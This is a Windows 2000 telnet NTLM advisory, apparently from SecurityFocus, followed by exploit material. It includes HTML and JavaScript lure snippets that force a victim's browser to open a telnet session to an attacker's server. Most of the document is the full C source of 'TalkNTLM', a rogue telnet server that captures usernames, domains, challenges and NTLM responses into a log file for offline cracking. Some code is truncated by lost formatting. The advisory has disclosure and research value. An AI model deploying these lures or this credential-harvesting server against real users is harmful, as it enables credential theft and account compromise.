source: https://www.securityfocus.com/bid/1683/info By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server: 1) frame src=telnet://target 2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker" 3) window.open("telnet://target") /* TalkNTLM - NTLM Logging Telnet Server * dildog@atstake.com * 8/14/00 * Copyright (C) 2000 @stake, Inc. */ #include #include #include #include #include #include #include #include #include #include #define MAJOR_VERSION 1 #define MINOR_VERSION 0 #define IAC 255 /* interpret as command: */ #define DONT 254 /* you are not to use option */ #define DO 253 /* please, you use option */ #define WONT 252 /* I won't use option */ #define WILL 251 /* I will use option */ #define SB 250 /* interpret as subnegotiation */ #define SE 240 /* end sub negotiation */ #define AUTH 37 #define IS 0 #define SEND 1 #define REPLY 2 #define NAME 3 #define NTLM 15 #define ACCEPT 1 typedef enum { METHOD_NONE=0, METHOD_TELNET } METHOD; typedef enum { SUBMETHOD_NONE=0, SUBMETHOD_LOG, } SUBMETHOD; #define COMMSOCK_BUFSIZ 2048 FILE *g_fCommSock; char g_CommSockBuf[COMMSOCK_BUFSIZ]; void error(const char *str) { fflush(stdout); fprintf(stderr,str); fflush(stderr); } unsigned char getb(void) { unsigned char b=0; fread(&b,1,1,g_fCommSock); return b; } unsigned short getdwl(void) { unsigned short s=0; s|=((unsigned short)getb()); s|=((unsigned short)getb())<<8; return s; } unsigned long getddl(void) { unsigned long l=0; l|=((unsigned long)getb()); l|=((unsigned long)getb())<<8; l|=((unsigned long)getb())<<16; l|=((unsigned long)getb())<<24; return l; } void putb(unsigned char c) { fwrite(&c,1,1,g_fCommSock); } void putdwl(unsigned short w) { putb(w&255); putb((w>>8)&255); } void putddl(unsigned long d) { putb(d&255); putb((d>>8)&255); putb((d>>16)&255); putb((d>>24)&255); } void putarrb(int n, unsigned char *b) { int i; for(i=0;i> IAC DO AUTH\n"); // See if client wants to authenticate if(getb()!=IAC) goto telnetlogfail; if(getb()!=WILL) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; printf("<< IAC WILL AUTH\n"); // Present authentication methods putb(IAC); putb(SB); putb(AUTH); putb(SEND); putb(NTLM); putb(0); putb(IAC); putb(SE); putflush(); printf(">> IAC SB AUTH SEND NTLM 0 IAC SE\n"); // Get NTLMSSP initial request if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; size=getddl()+4; if(size>2048) goto telnetlogfail; respbuf=(unsigned char *)malloc(size); int i; for(i=0;i> IAC SB AUTH REPLY NTLM 0 1 ... challenge ... IAC SE\n"); // Get the reply packet if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=2) goto telnetlogfail; size=getddl()+4; if(size>2048 || size<64) goto telnetlogfail; printf("8\n"); respbuf=(unsigned char *)malloc(size); for(i=0;i>1]=username[i]; } usernamelen>>=1; printf("\n"); fprintf(lf,":"); free(username); // Get domainname int domainnamelen,domainnameoff; char *domainname; domainnamelen=respbuf[0x20] | (respbuf[0x21]<<8); domainnameoff=respbuf[0x24] | (respbuf[0x25]<<8) | (respbuf[0x26]<<16) | (respbuf[0x27]<<24); domainname=(char *)malloc(domainnamelen); if(!domainname) goto telnetlogfail; memcpy(domainname,&respbuf[domainnameoff+4],domainnamelen); printf("Domain: "); for(i=0;i>1]=domainname[i]; } domainnamelen>>=1; printf("\n"); fprintf(lf,":"); free(domainname); // Write challenge fprintf(lf,"%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X:", challenge[0],challenge[1],challenge[2],challenge[3], challenge[4],challenge[5],challenge[6],challenge[7]); // Get NT response int ntresplen,ntrespoff; unsigned char *ntresp; ntresplen=respbuf[0x10] | (respbuf[0x11]<<8); ntrespoff=respbuf[0x14];// | (respbuf[0x15]<<8) | (respbuf[0x16]<<16) | (respbuf[0x17]<<24); ntresp=(unsigned char *)malloc(ntresplen); if(!ntresp) goto telnetlogfail; memcpy(ntresp,&respbuf[ntrespoff+4],ntresplen); printf("NT Response:\n"); for(i=0;i] -l \n",progname); exit(exitcode); } int main(int argc, char *argv[]) { unsigned char b; int i,tp; // Get options int opt_port=0; char *opt_logfile=NULL; METHOD opt_method=METHOD_NONE; SUBMETHOD opt_submethod=SUBMETHOD_NONE; char oc; while((oc=getopt(argc,argv,"l:p:t"))>0) { switch(oc) { case 't': opt_method=METHOD_TELNET; if(opt_port==0) { opt_port=23; } break; case 'p': opt_port=atoi(optarg); break; case 'l': opt_logfile=optarg; if(opt_submethod!=SUBMETHOD_NONE) usage(argv[0],-2); opt_submethod=SUBMETHOD_LOG; break; default: usage(argv[0],-3); break; } } // Go to the particular method if(opt_method==METHOD_NONE) { usage(argv[0],-4); } else if(opt_method==METHOD_TELNET) { // Telnet methods if(opt_submethod==SUBMETHOD_NONE) { usage(argv[0],-5); } else if(opt_submethod==SUBMETHOD_LOG) { // Telnet hash logging if(opt_logfile==NULL) { usage(argv[0],-7); } if(do_telnet_log(opt_port,opt_logfile)!=0) return -8; } } return 0; }